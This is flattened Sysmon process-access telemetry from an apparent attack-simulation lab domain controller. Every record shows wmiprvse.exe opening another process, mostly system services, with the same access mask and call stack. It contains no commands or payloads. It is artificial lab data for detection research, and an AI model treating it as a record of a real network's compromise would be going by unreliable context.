16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029820Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029819Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029818Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029817Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029816Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029815Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029814Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.952{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029813Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029812Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029811Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029810Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029809Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029808Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029807Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029806Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029805Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029804Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029803Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029802Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029801Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 